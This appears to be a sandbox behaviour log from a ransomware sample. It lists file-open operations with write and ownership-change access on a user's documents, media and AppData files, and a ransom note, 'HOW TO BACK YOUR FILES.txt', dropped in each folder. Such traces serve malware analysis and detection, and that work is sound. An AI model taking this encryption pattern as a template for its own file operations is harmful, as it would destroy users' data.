Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\PPT9PcnpxhtaoWPAl.ots desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\tlQ2QreLWNw1C.ots desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\-fpJmWMI.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\-JwUYt-2tOoXas.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\F _E.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\gFCS.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\YwT0L2uHZ5 4t5VAQEl.odp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\uTNr\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\uTNr\oqmQZYL-UF.pps desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\uTNr\rZAFx7yv0j4OpKr0.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\49_hdOHrBSo9\uTNr\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Desktop\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\2-Z3wOJH3aw8Gc23B.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\41qdC6QgBU.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\4F1Tg Snje_K.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\4OW_EMMxH1R6Pq3.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\7qqNe7s7XL.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\8KsFVV OpOh6.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\anMNjT J.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\C6uP5iN6LVPrE8U.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\ClJz2xAW_8zhk38m.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\D lSV8sh3seQkpeGf8.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\ewezVPkDgW.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\G0J-6mO5v.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\GOw9MGna.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\GsuT4BW5pRWHUukU9.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\KSzlu5oxR5sFseX2y0.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\la3j1A5Jj.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\LnvDKMi.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\m1HgOc.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\N3hw-iK.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\PT36K2PFOA8Wd0big.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\qd_icl1FnCPEAdw.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\qRlW8xjuiQwW5.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\rlF-zhRIKD7PdF8Xi0UD.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\SIddsZ.ppt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\ssoUEo7W-0UrZF.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UdqNl Lu10Gn.xls desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\Ur9UXi87PYp.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\wbsZjt46N6Bq440.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\x-r-NNo.xls desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\XCT6Fbj.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\yCE8TOTz8j0hoj8IV.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\ZzG5k.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\B66_a.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\BZhPxLldD zvXbBb.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\fmLa.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\mh4EU.ots desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\p8YxsrELn8XKWAj6S.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\qoUYKef.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\qRf30E0va-Q5qcX8J.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\rsSN39k30qsRCD.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\SabX6Zgr AAwOd.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\u-KUQZAFiS.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\WcVaPByj3hFUdu9J.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\YFZqM1OxNBw9.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Contacts\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Contacts\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\0UQahDxA.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\2oLQAuOM3KfTs0.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\88ufiGMYBLxXyRM.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\8_EFGX27w7PcwVcM.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\B3oYZNTXYVTXgAyXg.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\BYMMds-tqy3Cr.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Ce_n4dDEp l89.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\CiU0ITa 8V.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\CmAysGSMk0dmaqiVK-.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\cNKcSEPhOVBzCC-S.swf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\CtsQxlryTc-FvxwK4.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\DcYe75yxfBjHF71TD.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\EJrA1rdWo4.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\FqChn0.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\GlZY7.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\hWfeMbbEV8M9x35_Hd8.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\J9xGx_zgbd5MhMcXW.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Knzg8bpR2isDXnxTV.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\N4 X-9_q.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
